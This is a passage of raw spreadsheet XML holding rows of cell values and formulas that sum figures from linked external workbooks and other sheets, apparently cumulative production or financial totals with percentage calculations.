      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]14'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]14'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]14'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]14'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]14'!$U$101</f>
        <v>68.7401785714286</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]14'!$V$101</f>
        <v>64.8262212643678</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]14'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]14'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]14'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]14'!$D$23+'[11]14'!$D$17+'[12]14'!$D$17+'[13]14'!$D$25+'[14]14'!$D$8+'[14]14'!$D$15+'[15]14'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]14'!$E$23+'[11]14'!$E$17+'[12]14'!$E$17+'[13]14'!$E$25+'[14]14'!$E$8+'[14]14'!$E$15+'[15]14'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'13'!H6</f>
        <v>5428</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>281777.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]14'!$I$23+'[11]14'!$I$17+'[12]14'!$I$17+'[13]14'!$I$25+'[14]14'!$E$23+'[14]14'!$E$30+'[15]14'!$H$7</f>
        <v>657.3</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'13'!K6</f>
        <v>9919.77</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>272117.47</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]14'!$L$23+'[11]14'!$L$17+'[12]14'!$L$17+'[13]14'!$L$25+'[14]14'!$H$23+'[14]14'!$H$30+'[15]14'!$K$7</f>
        <v>27621.07</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]14'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]14'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]14'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]14'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]14'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]14'!$V$102</f>
        <v>34.0660799808429</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]14'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]14'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]14'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]14'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]14'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'13'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]14'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'13'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]14'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]14'!$W$107</f>
        <v>127.303465765004</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]14'!$X$107</f>
        <v>126.357279084552</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]14'!$Y$107</f>
        <v>131.599520193134</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]14'!$T$107</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]14'!$U$107</f>
        <v>46.8154761904762</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]14'!$V$107</f>
        <v>31.641882183908</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]14'!$Q$107</f>
        <v>11.83</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]14'!$R$107</f>
        <v>157.3</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]14'!$S$107</f>
        <v>2642.73</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]14'!$D$27+'[11]14'!$D$18+'[13]14'!$D$26+'[14]14'!$D$10+'[14]14'!$D$17+'[15]14'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]14'!$E$27+'[11]14'!$E$18+'[13]14'!$E$26+'[14]14'!$E$10+'[14]14'!$E$17+'[15]14'!$E$9</f>
        <v>3997</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'13'!H8</f>
        <v>31228</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>556764.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]14'!$I$27+'[11]14'!$I$18+'[13]14'!$I$26+'[14]14'!$E$25+'[14]14'!$E$32+'[15]14'!$H$9</f>
        <v>2662.64</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'13'!K8</f>
        <v>35342.31</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>543087.02</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]14'!$L$27+'[11]14'!$L$18+'[13]14'!$L$26+'[14]14'!$H$25+'[14]14'!$H$32+'[15]14'!$K$9</f>
        <v>37765.59</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]14'!$W$108</f>
        <v>141.473864610111</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]14'!$X$108</f>
        <v>132.169840774274</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]14'!$Y$108</f>
        <v>127.746711921935</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]14'!$T$108</f>
        <v>48.625</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]14'!$U$108</f>
        <v>47.6636904761905</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]14'!$V$108</f>
        <v>28.220785440613</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]14'!$Q$108</f>
        <v>11.67</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]14'!$R$108</f>
        <v>160.15</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]14'!$S$108</f>
        <v>2357</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]14'!$D$24+'[11]14'!$D$19+'[12]14'!$D$20+'[13]14'!$D$27+'[14]14'!$D$11+'[14]14'!$D$18+'[15]14'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]14'!$E$24+'[11]14'!$E$19+'[12]14'!$E$20+'[13]14'!$E$27+'[14]14'!$E$11+'[14]14'!$E$18+'[15]14'!$E$10</f>
        <v>14763</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'13'!H9</f>
        <v>216718</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4352106.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]14'!$I$24+'[11]14'!$I$19+'[12]14'!$I$20+'[13]14'!$I$27+'[14]14'!$E$26+'[14]14'!$E$33+'[15]14'!$H$10</f>
        <v>15353.4</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'13'!K9</f>
        <v>214682.23</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4312161.041</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]14'!$L$24+'[11]14'!$L$19+'[12]14'!$L$20+'[13]14'!$L$27+'[14]14'!$H$26+'[14]14'!$H$33+'[15]14'!$K$10</f>
        <v>112901.482</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]14'!$W$109</f>
        <v>290.419161676647</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]14'!$X$109</f>
        <v>272.926639207392</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]14'!$Y$109</f>
        <v>271.363267739186</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]14'!$T$109</f>
        <v>6.95833333333333</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]14'!$U$109</f>
        <v>26.7351190476191</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]14'!$V$109</f>
        <v>34.5476532567049</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]14'!$Q$109</f>
        <v>1.67</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]14'!$R$109</f>
        <v>89.83</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]14'!$S$109</f>
        <v>2885.42</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]14'!$D$25+'[11]14'!$D$20+'[12]14'!$D$21+'[13]14'!$D$28+'[14]14'!$D$12+'[14]14'!$D$19+'[15]14'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]14'!$E$25+'[11]14'!$E$20+'[12]14'!$E$21+'[13]14'!$E$28+'[14]14'!$E$12+'[14]14'!$E$19+'[15]14'!$E$11</f>
        <v>485</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'13'!H10</f>
        <v>27058</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>944585.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]14'!$I$25+'[11]14'!$I$20+'[12]14'!$I$21+'[13]14'!$I$28+'[14]14'!$E$27+'[14]14'!$E$34+'[15]14'!$H$11</f>
        <v>2608.62</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'13'!K10</f>
        <v>40158.18</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>937386.9</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]14'!$L$25+'[11]14'!$L$20+'[12]14'!$L$21+'[13]14'!$L$28+'[14]14'!$H$27+'[14]14'!$H$34+'[15]14'!$K$11</f>
        <v>48106.762</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]14'!$W$110</f>
        <v>264.26735218509</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]14'!$X$110</f>
        <v>256.45045045045</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]14'!$Y$110</f>
        <v>268.372138320592</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]14'!$T$110</f>
        <v>48.625</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]14'!$U$110</f>
        <v>33.0357142857143</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]14'!$V$110</f>
        <v>34.4236111111111</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]14'!$Q$110</f>
        <v>11.67</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]14'!$R$110</f>
        <v>111</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]14'!$S$110</f>
        <v>2875.06</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]14'!$D$26+'[11]14'!$D$21+'[12]14'!$D$19+'[13]14'!$D$29+'[14]14'!$D$13+'[14]14'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]14'!$E$26+'[11]14'!$E$21+'[12]14'!$E$19+'[13]14'!$E$29+'[14]14'!$E$13+'[14]14'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'13'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]14'!$I$26+'[11]14'!$I$21+'[12]14'!$I$19+'[13]14'!$I$29+'[14]14'!$E$28+'[14]14'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'13'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]14'!$L$26+'[11]14'!$L$21+'[12]14'!$L$19+'[13]14'!$L$29+'[14]14'!$H$28+'[14]14'!$H$35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6013.00000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'13'!H12</f>
        <v>128251</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5070642.25</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>15001.17</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'13'!K12</f>
        <v>245739.108</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5274845.484</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>288263.44700005</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>65.6636553530867</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]14'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]14'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]14'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]14'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]14'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]14'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]14'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]14'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]14'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'13'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'13'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>52.8923755963395</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]14'!$W$68</f>
        <v>250.541666666667</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]14'!$X$68</f>
        <v>262.364</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]14'!$Y$68</f>
        <v>266.214353616138</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]14'!$T$68</f>
        <v>100</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]14'!$U$68</f>
        <v>74.4047619047619</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]14'!$V$68</f>
        <v>71.6658285440613</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]14'!$Q$68</f>
        <v>24.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]14'!$R$68</f>
        <v>250.00</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]14'!$S$68</f>
        <v>5985.53</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>4489</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'13'!H14</f>
        <v>36716</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1001259.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>5490.52</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'13'!K14</f>
        <v>75938.975</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1868883.081</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>62579.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]14'!$W$71</f>
        <v>211.891891891892</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]14'!$X$71</f>
        <v>217.283149470041</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]14'!$Y$71</f>
        <v>213.666589891296</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]14'!$T$71</f>
        <v>38.5416666666667</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]14'!$U$71</f>
        <v>55.0357142857143</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]14'!$V$71</f>
        <v>50.4240900383142</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]14'!$Q$71</f>
        <v>9.25</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]14'!$R$71</f>
        <v>184.92</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]14'!$S$71</f>
        <v>4211.42</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'13'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>0</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'13'!K15</f>
        <v>4620.633</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>119377.133</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]14'!$W$72</f>
        <v>63.2083333333333</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]14'!$X$72</f>
        <v>62.6417258569727</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]14'!$Y$72</f>
        <v>61.3558951100888</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]14'!$T$72</f>
        <v>100</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]14'!$U$72</f>
        <v>67.4613095238095</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]14'!$V$72</f>
        <v>51.4268438697318</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]14'!$Q$72</f>
        <v>24.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]14'!$R$72</f>
        <v>226.67</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]14'!$S$72</f>
        <v>4295.17</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'13'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'13'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]14'!$W$73</f>
        <v>54.9166666666667</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]14'!$X$73</f>
        <v>59.9682357612388</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]14'!$Y$73</f>
        <v>62.7657205259921</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]14'!$T$73</f>
        <v>100</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]14'!$U$73</f>
        <v>67.4613095238095</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]14'!$V$73</f>
        <v>52.955938697318</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]14'!$Q$73</f>
        <v>24.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]14'!$R$73</f>
        <v>226.67</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]14'!$S$73</f>
        <v>4422.88</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'13'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'13'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]14'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]14'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]14'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]14'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]14'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]14'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]14'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]14'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]14'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'13'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'13'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]14'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]14'!$X$74</f>
        <v>217.4</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]14'!$Y$74</f>
        <v>222.151267886405</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]14'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]14'!$U$74</f>
        <v>8.92857142857143</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]14'!$V$74</f>
        <v>7.08728448275862</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]14'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]14'!$R$74</f>
        <v>30</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]14'!$S$74</f>
        <v>591.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'13'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
